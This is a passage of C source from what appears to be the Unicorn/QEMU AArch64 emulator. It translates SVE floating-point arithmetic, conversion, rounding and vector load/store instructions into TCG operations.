gen_helper_gvec_##name##_d \ }; \ return do_zzz_fp(s, a, fns[a->esz]); \ } DO_FP3(FADD_zzz, fadd) DO_FP3(FSUB_zzz, fsub) DO_FP3(FMUL_zzz, fmul) DO_FP3(FTSMUL, ftsmul) DO_FP3(FRECPS, recps) DO_FP3(FRSQRTS, rsqrts) #undef DO_FP3 /* *** SVE Floating Point Arithmetic - Predicated Group */ static bool do_zpzz_fp(DisasContext *s, arg_rprr_esz *a, gen_helper_gvec_4_ptr *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (fn == NULL) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); TCGv_ptr status = get_fpstatus_ptr(tcg_ctx, a->esz == MO_16); tcg_gen_gvec_4_ptr(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), pred_full_reg_offset(s, a->pg), status, vsz, vsz, 0, fn); tcg_temp_free_ptr(tcg_ctx, status); } return true; } #define DO_FP3(NAME, name) \ static bool trans_##NAME(DisasContext *s, arg_rprr_esz *a) \ { \ static gen_helper_gvec_4_ptr * const fns[4] = { \ NULL, gen_helper_sve_##name##_h, \ gen_helper_sve_##name##_s, gen_helper_sve_##name##_d \ }; \ return do_zpzz_fp(s, a, fns[a->esz]); \ } DO_FP3(FADD_zpzz, fadd) DO_FP3(FSUB_zpzz, fsub) DO_FP3(FMUL_zpzz, fmul) DO_FP3(FMIN_zpzz, fmin) DO_FP3(FMAX_zpzz, fmax) DO_FP3(FMINNM_zpzz, fminnum) DO_FP3(FMAXNM_zpzz, fmaxnum) DO_FP3(FABD, fabd) DO_FP3(FSCALE, fscalbn) DO_FP3(FDIV, fdiv) DO_FP3(FMULX, fmulx) #undef DO_FP3 typedef void gen_helper_sve_fp2scalar(TCGContext *, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_i64, TCGv_ptr, TCGv_i32); static void do_fp_scalar(DisasContext *s, int zd, int zn, int pg, bool is_fp16, TCGv_i64 scalar, gen_helper_sve_fp2scalar *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned vsz = vec_full_reg_size(s); 
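/* Common expansion for predicated FP ops with a scalar operand: the
 * scalar is always passed as a 64-bit value, and the helper consumes
 * only the low bits implied by the element size.
 */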
TCGv_ptr t_zd, t_zn, t_pg, status; TCGv_i32 desc; t_zd = tcg_temp_new_ptr(tcg_ctx); t_zn = tcg_temp_new_ptr(tcg_ctx); t_pg = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, t_zd, tcg_ctx->cpu_env, vec_full_reg_offset(s, zd)); tcg_gen_addi_ptr(tcg_ctx, t_zn, tcg_ctx->cpu_env, vec_full_reg_offset(s, zn)); tcg_gen_addi_ptr(tcg_ctx, t_pg, tcg_ctx->cpu_env, pred_full_reg_offset(s, pg)); status = get_fpstatus_ptr(tcg_ctx, is_fp16); desc = tcg_const_i32(tcg_ctx, simd_desc(vsz, vsz, 0)); fn(tcg_ctx, t_zd, t_zn, t_pg, scalar, status, desc); tcg_temp_free_i32(tcg_ctx, desc); tcg_temp_free_ptr(tcg_ctx, status); tcg_temp_free_ptr(tcg_ctx, t_pg); tcg_temp_free_ptr(tcg_ctx, t_zn); tcg_temp_free_ptr(tcg_ctx, t_zd); } static void do_fp_imm(DisasContext *s, arg_rpri_esz *a, uint64_t imm, gen_helper_sve_fp2scalar *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 temp = tcg_const_i64(tcg_ctx, imm); do_fp_scalar(s, a->rd, a->rn, a->pg, a->esz == MO_16, temp, fn); tcg_temp_free_i64(tcg_ctx, temp); } #define DO_FP_IMM(NAME, name, const0, const1) \ static bool trans_##NAME##_zpzi(DisasContext *s, arg_rpri_esz *a) \ { \ static gen_helper_sve_fp2scalar * const fns[3] = { \ gen_helper_sve_##name##_h, \ gen_helper_sve_##name##_s, \ gen_helper_sve_##name##_d \ }; \ static uint64_t const val[3][2] = { \ { float16_##const0, float16_##const1 }, \ { float32_##const0, float32_##const1 }, \ { float64_##const0, float64_##const1 }, \ }; \ if (a->esz == 0) { \ return false; \ } \ if (sve_access_check(s)) { \ do_fp_imm(s, a, val[a->esz - 1][a->imm], fns[a->esz - 1]); \ } \ return true; \ } #define float16_two make_float16(0x4000) #define float32_two make_float32(0x40000000) #define float64_two make_float64(0x4000000000000000ULL) DO_FP_IMM(FADD, fadds, half, one) DO_FP_IMM(FSUB, fsubs, half, one) DO_FP_IMM(FMUL, fmuls, half, two) DO_FP_IMM(FSUBR, fsubrs, half, one) DO_FP_IMM(FMAXNM, fmaxnms, zero, one) DO_FP_IMM(FMINNM, fminnms, zero, one) DO_FP_IMM(FMAX, fmaxs, zero, one) DO_FP_IMM(FMIN, fmins, zero, one) #undef DO_FP_IMM static bool do_fp_cmp(DisasContext *s, arg_rprr_esz *a, gen_helper_gvec_4_ptr *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (fn == NULL) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); TCGv_ptr status = get_fpstatus_ptr(tcg_ctx, a->esz == MO_16); tcg_gen_gvec_4_ptr(tcg_ctx, pred_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), pred_full_reg_offset(s, a->pg), status, vsz, vsz, 0, fn); tcg_temp_free_ptr(tcg_ctx, status); } return true; } #define DO_FPCMP(NAME, name) \ static bool trans_##NAME##_ppzz(DisasContext *s, arg_rprr_esz *a) \ { \ static gen_helper_gvec_4_ptr * const fns[4] = { \ NULL, gen_helper_sve_##name##_h, \ gen_helper_sve_##name##_s, gen_helper_sve_##name##_d \ }; \ return do_fp_cmp(s, a, fns[a->esz]); \ } DO_FPCMP(FCMGE, fcmge) DO_FPCMP(FCMGT, fcmgt) DO_FPCMP(FCMEQ, fcmeq) DO_FPCMP(FCMNE, fcmne) DO_FPCMP(FCMUO, fcmuo) DO_FPCMP(FACGE, facge) DO_FPCMP(FACGT, facgt) #undef DO_FPCMP static bool trans_FCADD(DisasContext *s, arg_FCADD *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_4_ptr * const fns[3] = { gen_helper_sve_fcadd_h, gen_helper_sve_fcadd_s, gen_helper_sve_fcadd_d }; if (a->esz == 0) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); TCGv_ptr status = get_fpstatus_ptr(tcg_ctx, a->esz == MO_16); tcg_gen_gvec_4_ptr(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), pred_full_reg_offset(s, a->pg), status, vsz, 
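/* The single rot bit rides in the descriptor data field and selects
 * between a rotation of 90 and 270 degrees in the helper.
 */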
vsz, a->rot, fns[a->esz - 1]); tcg_temp_free_ptr(tcg_ctx, status); } return true; } typedef void gen_helper_sve_fmla(TCGContext *, TCGv_env, TCGv_ptr, TCGv_i32); static bool do_fmla(DisasContext *s, arg_rprrr_esz *a, gen_helper_sve_fmla *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (fn == NULL) { return false; } if (!sve_access_check(s)) { return true; } unsigned vsz = vec_full_reg_size(s); unsigned desc; TCGv_i32 t_desc; TCGv_ptr pg = tcg_temp_new_ptr(tcg_ctx); /* We would need 7 operands to pass these arguments "properly". * So we encode all the register numbers into the descriptor. */ desc = deposit32(a->rd, 5, 5, a->rn); desc = deposit32(desc, 10, 5, a->rm); desc = deposit32(desc, 15, 5, a->ra); desc = simd_desc(vsz, vsz, desc); t_desc = tcg_const_i32(tcg_ctx, desc); tcg_gen_addi_ptr(tcg_ctx, pg, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->pg)); fn(tcg_ctx, tcg_ctx->cpu_env, pg, t_desc); tcg_temp_free_i32(tcg_ctx, t_desc); tcg_temp_free_ptr(tcg_ctx, pg); return true; } #define DO_FMLA(NAME, name) \ static bool trans_##NAME(DisasContext *s, arg_rprrr_esz *a) \ { \ static gen_helper_sve_fmla * const fns[4] = { \ NULL, gen_helper_sve_##name##_h, \ gen_helper_sve_##name##_s, gen_helper_sve_##name##_d \ }; \ return do_fmla(s, a, fns[a->esz]); \ } DO_FMLA(FMLA_zpzzz, fmla_zpzzz) DO_FMLA(FMLS_zpzzz, fmls_zpzzz) DO_FMLA(FNMLA_zpzzz, fnmla_zpzzz) DO_FMLA(FNMLS_zpzzz, fnmls_zpzzz) #undef DO_FMLA static bool trans_FCMLA_zpzzz(DisasContext *s, arg_FCMLA_zpzzz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_sve_fmla * const fns[3] = { gen_helper_sve_fcmla_zpzzz_h, gen_helper_sve_fcmla_zpzzz_s, gen_helper_sve_fcmla_zpzzz_d, }; if (a->esz == 0) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); unsigned desc; TCGv_i32 t_desc; TCGv_ptr pg = tcg_temp_new_ptr(tcg_ctx); /* We would need 7 operands to pass these arguments "properly". * So we encode all the register numbers into the descriptor. 
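* Layout of the packed value: zd in bits [4:0], zn in [9:5], zm in
* [14:10], za in [19:15] and rot in [21:20].  The sextract32() keeps
* the result within the 22 data bits that simd_desc() accepts.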
*/ desc = deposit32(a->rd, 5, 5, a->rn); desc = deposit32(desc, 10, 5, a->rm); desc = deposit32(desc, 15, 5, a->ra); desc = deposit32(desc, 20, 2, a->rot); desc = sextract32(desc, 0, 22); desc = simd_desc(vsz, vsz, desc); t_desc = tcg_const_i32(tcg_ctx, desc); tcg_gen_addi_ptr(tcg_ctx, pg, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->pg)); fns[a->esz - 1](tcg_ctx, tcg_ctx->cpu_env, pg, t_desc); tcg_temp_free_i32(tcg_ctx, t_desc); tcg_temp_free_ptr(tcg_ctx, pg); } return true; } static bool trans_FCMLA_zzxz(DisasContext *s, arg_FCMLA_zzxz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_3_ptr * const fns[2] = { gen_helper_gvec_fcmlah_idx, gen_helper_gvec_fcmlas_idx, }; tcg_debug_assert(a->esz == 1 || a->esz == 2); tcg_debug_assert(a->rd == a->ra); if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); TCGv_ptr status = get_fpstatus_ptr(tcg_ctx, a->esz == MO_16); tcg_gen_gvec_3_ptr(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), status, vsz, vsz, a->index * 4 + a->rot, fns[a->esz - 1]); tcg_temp_free_ptr(tcg_ctx, status); } return true; } /* *** SVE Floating Point Unary Operations Predicated Group */ static bool do_zpz_ptr(DisasContext *s, int rd, int rn, int pg, bool is_fp16, gen_helper_gvec_3_ptr *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); TCGv_ptr status = get_fpstatus_ptr(tcg_ctx, is_fp16); tcg_gen_gvec_3_ptr(tcg_ctx, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), pred_full_reg_offset(s, pg), status, vsz, vsz, 0, fn); tcg_temp_free_ptr(tcg_ctx, status); } return true; } static bool trans_FCVT_sh(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_fcvt_sh); } static bool trans_FCVT_hs(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_fcvt_hs); } static bool trans_FCVT_dh(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_fcvt_dh); } static bool trans_FCVT_hd(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_fcvt_hd); } static bool trans_FCVT_ds(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_fcvt_ds); } static bool trans_FCVT_sd(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_fcvt_sd); } static bool trans_FCVTZS_hh(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, true, gen_helper_sve_fcvtzs_hh); } static bool trans_FCVTZU_hh(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, true, gen_helper_sve_fcvtzu_hh); } static bool trans_FCVTZS_hs(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, true, gen_helper_sve_fcvtzs_hs); } static bool trans_FCVTZU_hs(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, true, gen_helper_sve_fcvtzu_hs); } static bool trans_FCVTZS_hd(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, true, gen_helper_sve_fcvtzs_hd); } static bool trans_FCVTZU_hd(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, true, gen_helper_sve_fcvtzu_hd); } static bool trans_FCVTZS_ss(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_fcvtzs_ss); } static bool trans_FCVTZU_ss(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, 
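/* Throughout this family of conversions, the bool selects which
 * float_status to use: true for the FP16 set, false for the
 * single/double set.
 */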
a->pg, false, gen_helper_sve_fcvtzu_ss); } static bool trans_FCVTZS_sd(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_fcvtzs_sd); } static bool trans_FCVTZU_sd(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_fcvtzu_sd); } static bool trans_FCVTZS_ds(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_fcvtzs_ds); } static bool trans_FCVTZU_ds(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_fcvtzu_ds); } static bool trans_FCVTZS_dd(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_fcvtzs_dd); } static bool trans_FCVTZU_dd(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_fcvtzu_dd); } static gen_helper_gvec_3_ptr * const frint_fns[3] = { gen_helper_sve_frint_h, gen_helper_sve_frint_s, gen_helper_sve_frint_d }; static bool trans_FRINTI(DisasContext *s, arg_rpr_esz *a) { if (a->esz == 0) { return false; } return do_zpz_ptr(s, a->rd, a->rn, a->pg, a->esz == MO_16, frint_fns[a->esz - 1]); } static bool trans_FRINTX(DisasContext *s, arg_rpr_esz *a) { static gen_helper_gvec_3_ptr * const fns[3] = { gen_helper_sve_frintx_h, gen_helper_sve_frintx_s, gen_helper_sve_frintx_d }; if (a->esz == 0) { return false; } return do_zpz_ptr(s, a->rd, a->rn, a->pg, a->esz == MO_16, fns[a->esz - 1]); } static bool do_frint_mode(DisasContext *s, arg_rpr_esz *a, int mode) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->esz == 0) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); TCGv_i32 tmode = tcg_const_i32(tcg_ctx, mode); TCGv_ptr status = get_fpstatus_ptr(tcg_ctx, a->esz == MO_16); gen_helper_set_rmode(tcg_ctx, tmode, tmode, status); tcg_gen_gvec_3_ptr(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), pred_full_reg_offset(s, a->pg), status, vsz, vsz, 0, frint_fns[a->esz - 1]); gen_helper_set_rmode(tcg_ctx, tmode, tmode, status); tcg_temp_free_i32(tcg_ctx, tmode); tcg_temp_free_ptr(tcg_ctx, status); } return true; } static bool trans_FRINTN(DisasContext *s, arg_rpr_esz *a) { return do_frint_mode(s, a, float_round_nearest_even); } static bool trans_FRINTP(DisasContext *s, arg_rpr_esz *a) { return do_frint_mode(s, a, float_round_up); } static bool trans_FRINTM(DisasContext *s, arg_rpr_esz *a) { return do_frint_mode(s, a, float_round_down); } static bool trans_FRINTZ(DisasContext *s, arg_rpr_esz *a) { return do_frint_mode(s, a, float_round_to_zero); } static bool trans_FRINTA(DisasContext *s, arg_rpr_esz *a) { return do_frint_mode(s, a, float_round_ties_away); } static bool trans_FRECPX(DisasContext *s, arg_rpr_esz *a) { static gen_helper_gvec_3_ptr * const fns[3] = { gen_helper_sve_frecpx_h, gen_helper_sve_frecpx_s, gen_helper_sve_frecpx_d }; if (a->esz == 0) { return false; } return do_zpz_ptr(s, a->rd, a->rn, a->pg, a->esz == MO_16, fns[a->esz - 1]); } static bool trans_FSQRT(DisasContext *s, arg_rpr_esz *a) { static gen_helper_gvec_3_ptr * const fns[3] = { gen_helper_sve_fsqrt_h, gen_helper_sve_fsqrt_s, gen_helper_sve_fsqrt_d }; if (a->esz == 0) { return false; } return do_zpz_ptr(s, a->rd, a->rn, a->pg, a->esz == MO_16, fns[a->esz - 1]); } static bool trans_SCVTF_hh(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, true, gen_helper_sve_scvt_hh); } static bool trans_SCVTF_sh(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, 
a->rn, a->pg, true, gen_helper_sve_scvt_sh); } static bool trans_SCVTF_dh(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, true, gen_helper_sve_scvt_dh); } static bool trans_SCVTF_ss(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_scvt_ss); } static bool trans_SCVTF_ds(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_scvt_ds); } static bool trans_SCVTF_sd(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_scvt_sd); } static bool trans_SCVTF_dd(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_scvt_dd); } static bool trans_UCVTF_hh(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, true, gen_helper_sve_ucvt_hh); } static bool trans_UCVTF_sh(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, true, gen_helper_sve_ucvt_sh); } static bool trans_UCVTF_dh(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, true, gen_helper_sve_ucvt_dh); } static bool trans_UCVTF_ss(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_ucvt_ss); } static bool trans_UCVTF_ds(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_ucvt_ds); } static bool trans_UCVTF_sd(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_ucvt_sd); } static bool trans_UCVTF_dd(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_ucvt_dd); } /* *** SVE Memory - 32-bit Gather and Unsized Contiguous Group */ /* Subroutine loading a vector register at VOFS of LEN bytes. * The load should begin at the address Rn + IMM. */ static void do_ldr(DisasContext *s, uint32_t vofs, int len, int rn, int imm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int len_align = QEMU_ALIGN_DOWN(len, 8); int len_remain = len % 8; int nparts = len / 8 + ctpop8(len_remain); int midx = get_mem_index(s); TCGv_i64 addr, t0, t1; addr = tcg_temp_new_i64(tcg_ctx); t0 = tcg_temp_new_i64(tcg_ctx); /* Note that unpredicated load/store of vector/predicate registers * are defined as a stream of bytes, which equates to little-endian * operations on larger quantities. There is no nice way to force * a little-endian load for aarch64_be-linux-user out of line. * * Attempt to keep code expansion to a minimum by limiting the * amount of unrolling done. */ if (nparts <= 4) { int i; for (i = 0; i < len_align; i += 8) { tcg_gen_addi_i64(tcg_ctx, addr, cpu_reg_sp(s, rn), imm + i); tcg_gen_qemu_ld_i64(tcg_ctx, t0, addr, midx, MO_LEQ); tcg_gen_st_i64(tcg_ctx, t0, tcg_ctx->cpu_env, vofs + i); } } else { TCGLabel *loop = gen_new_label(tcg_ctx); TCGv_ptr tp, i = tcg_const_local_ptr(tcg_ctx, 0); gen_set_label(tcg_ctx, loop); /* Minimize the number of local temps that must be re-read from * the stack each iteration. Instead, re-compute values other * than the loop counter. 
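* The loop counter i is allocated with tcg_const_local_ptr() so that
* its value survives the backward branch; addr and tp are derived
* from it afresh on every iteration.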
*/ tp = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, tp, i, imm); tcg_gen_extu_ptr_i64(tcg_ctx, addr, tp); tcg_gen_add_i64(tcg_ctx, addr, addr, cpu_reg_sp(s, rn)); tcg_gen_qemu_ld_i64(tcg_ctx, t0, addr, midx, MO_LEQ); tcg_gen_add_ptr(tcg_ctx, tp, tcg_ctx->cpu_env, i); tcg_gen_addi_ptr(tcg_ctx, i, i, 8); tcg_gen_st_i64(tcg_ctx, t0, tp, vofs); tcg_temp_free_ptr(tcg_ctx, tp); tcg_gen_brcondi_ptr(tcg_ctx, TCG_COND_LTU, i, len_align, loop); tcg_temp_free_ptr(tcg_ctx, i); } /* Predicate register loads can be any multiple of 2. * Note that we still store the entire 64-bit unit into cpu_env. */ if (len_remain) { tcg_gen_addi_i64(tcg_ctx, addr, cpu_reg_sp(s, rn), imm + len_align); switch (len_remain) { case 2: case 4: case 8: tcg_gen_qemu_ld_i64(tcg_ctx, t0, addr, midx, MO_LE | ctz32(len_remain)); break; case 6: t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, t0, addr, midx, MO_LEUL); tcg_gen_addi_i64(tcg_ctx, addr, addr, 4); tcg_gen_qemu_ld_i64(tcg_ctx, t1, addr, midx, MO_LEUW); tcg_gen_deposit_i64(tcg_ctx, t0, t0, t1, 32, 32); tcg_temp_free_i64(tcg_ctx, t1); break; default: g_assert_not_reached(); } tcg_gen_st_i64(tcg_ctx, t0, tcg_ctx->cpu_env, vofs + len_align); } tcg_temp_free_i64(tcg_ctx, addr); tcg_temp_free_i64(tcg_ctx, t0); } /* Similarly for stores. */ static void do_str(DisasContext *s, uint32_t vofs, int len, int rn, int imm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int len_align = QEMU_ALIGN_DOWN(len, 8); int len_remain = len % 8; int nparts = len / 8 + ctpop8(len_remain); int midx = get_mem_index(s); TCGv_i64 addr, t0; addr = tcg_temp_new_i64(tcg_ctx); t0 = tcg_temp_new_i64(tcg_ctx); /* Note that unpredicated load/store of vector/predicate registers * are defined as a stream of bytes, which equates to little-endian * operations on larger quantities. There is no nice way to force * a little-endian store for aarch64_be-linux-user out of line. * * Attempt to keep code expansion to a minimum by limiting the * amount of unrolling done. */ if (nparts <= 4) { int i; for (i = 0; i < len_align; i += 8) { tcg_gen_ld_i64(tcg_ctx, t0, tcg_ctx->cpu_env, vofs + i); tcg_gen_addi_i64(tcg_ctx, addr, cpu_reg_sp(s, rn), imm + i); tcg_gen_qemu_st_i64(tcg_ctx, t0, addr, midx, MO_LEQ); } } else { TCGLabel *loop = gen_new_label(tcg_ctx); TCGv_ptr t2, i = tcg_const_local_ptr(tcg_ctx, 0); gen_set_label(tcg_ctx, loop); t2 = tcg_temp_new_ptr(tcg_ctx); tcg_gen_add_ptr(tcg_ctx, t2, tcg_ctx->cpu_env, i); tcg_gen_ld_i64(tcg_ctx, t0, t2, vofs); /* Minimize the number of local temps that must be re-read from * the stack each iteration. Instead, re-compute values other * than the loop counter. */ tcg_gen_addi_ptr(tcg_ctx, t2, i, imm); tcg_gen_extu_ptr_i64(tcg_ctx, addr, t2); tcg_gen_add_i64(tcg_ctx, addr, addr, cpu_reg_sp(s, rn)); tcg_temp_free_ptr(tcg_ctx, t2); tcg_gen_qemu_st_i64(tcg_ctx, t0, addr, midx, MO_LEQ); tcg_gen_addi_ptr(tcg_ctx, i, i, 8); tcg_gen_brcondi_ptr(tcg_ctx, TCG_COND_LTU, i, len_align, loop); tcg_temp_free_ptr(tcg_ctx, i); } /* Predicate register stores can be any multiple of 2. 
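* A remainder of 2, 4 or 8 maps onto a single little-endian store;
* 6 is split into a 4-byte store plus a 2-byte store of the
* shifted-down high half.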
*/ if (len_remain) { tcg_gen_ld_i64(tcg_ctx, t0, tcg_ctx->cpu_env, vofs + len_align); tcg_gen_addi_i64(tcg_ctx, addr, cpu_reg_sp(s, rn), imm + len_align); switch (len_remain) { case 2: case 4: case 8: tcg_gen_qemu_st_i64(tcg_ctx, t0, addr, midx, MO_LE | ctz32(len_remain)); break; case 6: tcg_gen_qemu_st_i64(tcg_ctx, t0, addr, midx, MO_LEUL); tcg_gen_addi_i64(tcg_ctx, addr, addr, 4); tcg_gen_shri_i64(tcg_ctx, t0, t0, 32); tcg_gen_qemu_st_i64(tcg_ctx, t0, addr, midx, MO_LEUW); break; default: g_assert_not_reached(); } } tcg_temp_free_i64(tcg_ctx, addr); tcg_temp_free_i64(tcg_ctx, t0); } static bool trans_LDR_zri(DisasContext *s, arg_rri *a) { if (sve_access_check(s)) { int size = vec_full_reg_size(s); int off = vec_full_reg_offset(s, a->rd); do_ldr(s, off, size, a->rn, a->imm * size); } return true; } static bool trans_LDR_pri(DisasContext *s, arg_rri *a) { if (sve_access_check(s)) { int size = pred_full_reg_size(s); int off = pred_full_reg_offset(s, a->rd); do_ldr(s, off, size, a->rn, a->imm * size); } return true; } static bool trans_STR_zri(DisasContext *s, arg_rri *a) { if (sve_access_check(s)) { int size = vec_full_reg_size(s); int off = vec_full_reg_offset(s, a->rd); do_str(s, off, size, a->rn, a->imm * size); } return true; } static bool trans_STR_pri(DisasContext *s, arg_rri *a) { if (sve_access_check(s)) { int size = pred_full_reg_size(s); int off = pred_full_reg_offset(s, a->rd); do_str(s, off, size, a->rn, a->imm * size); } return true; } /* *** SVE Memory - Contiguous Load Group */ /* The memory mode of the dtype. */ static const MemOp dtype_mop[16] = { MO_UB, MO_UB, MO_UB, MO_UB, MO_SL, MO_UW, MO_UW, MO_UW, MO_SW, MO_SW, MO_UL, MO_UL, MO_SB, MO_SB, MO_SB, MO_Q }; #define dtype_msz(x) (dtype_mop[x] & MO_SIZE) /* The vector element size of dtype. */ static const uint8_t dtype_esz[16] = { 0, 1, 2, 3, 3, 1, 2, 3, 3, 2, 2, 3, 3, 2, 1, 3 }; static TCGMemOpIdx sve_memopidx(DisasContext *s, int dtype) { return make_memop_idx(s->be_data | dtype_mop[dtype], get_mem_index(s)); } static void do_mem_zpa(DisasContext *s, int zt, int pg, TCGv_i64 addr, int dtype, gen_helper_gvec_mem *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned vsz = vec_full_reg_size(s); TCGv_ptr t_pg; TCGv_i32 t_desc; int desc; /* For e.g. LD4, there are not enough arguments to pass all 4 * registers as pointers, so encode the regno into the data field. * For consistency, do this even for LD1. 
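* The descriptor therefore stacks three things: the memop/mmu-index
* pair from sve_memopidx() in the low bits, the register number zt
* above MEMOPIDX_SHIFT, and the combined value in simd_desc()'s
* data field.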
*/ desc = sve_memopidx(s, dtype); desc |= zt << MEMOPIDX_SHIFT; desc = simd_desc(vsz, vsz, desc); t_desc = tcg_const_i32(tcg_ctx, desc); t_pg = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, t_pg, tcg_ctx->cpu_env, pred_full_reg_offset(s, pg)); fn(tcg_ctx, tcg_ctx->cpu_env, t_pg, addr, t_desc); tcg_temp_free_ptr(tcg_ctx, t_pg); tcg_temp_free_i32(tcg_ctx, t_desc); } static void do_ld_zpa(DisasContext *s, int zt, int pg, TCGv_i64 addr, int dtype, int nreg) { static gen_helper_gvec_mem * const fns[2][16][4] = { /* Little-endian */ { { gen_helper_sve_ld1bb_r, gen_helper_sve_ld2bb_r, gen_helper_sve_ld3bb_r, gen_helper_sve_ld4bb_r }, { gen_helper_sve_ld1bhu_r, NULL, NULL, NULL }, { gen_helper_sve_ld1bsu_r, NULL, NULL, NULL }, { gen_helper_sve_ld1bdu_r, NULL, NULL, NULL }, { gen_helper_sve_ld1sds_le_r, NULL, NULL, NULL }, { gen_helper_sve_ld1hh_le_r, gen_helper_sve_ld2hh_le_r, gen_helper_sve_ld3hh_le_r, gen_helper_sve_ld4hh_le_r }, { gen_helper_sve_ld1hsu_le_r, NULL, NULL, NULL }, { gen_helper_sve_ld1hdu_le_r, NULL, NULL, NULL }, { gen_helper_sve_ld1hds_le_r, NULL, NULL, NULL }, { gen_helper_sve_ld1hss_le_r, NULL, NULL, NULL }, { gen_helper_sve_ld1ss_le_r, gen_helper_sve_ld2ss_le_r, gen_helper_sve_ld3ss_le_r, gen_helper_sve_ld4ss_le_r }, { gen_helper_sve_ld1sdu_le_r, NULL, NULL, NULL }, { gen_helper_sve_ld1bds_r, NULL, 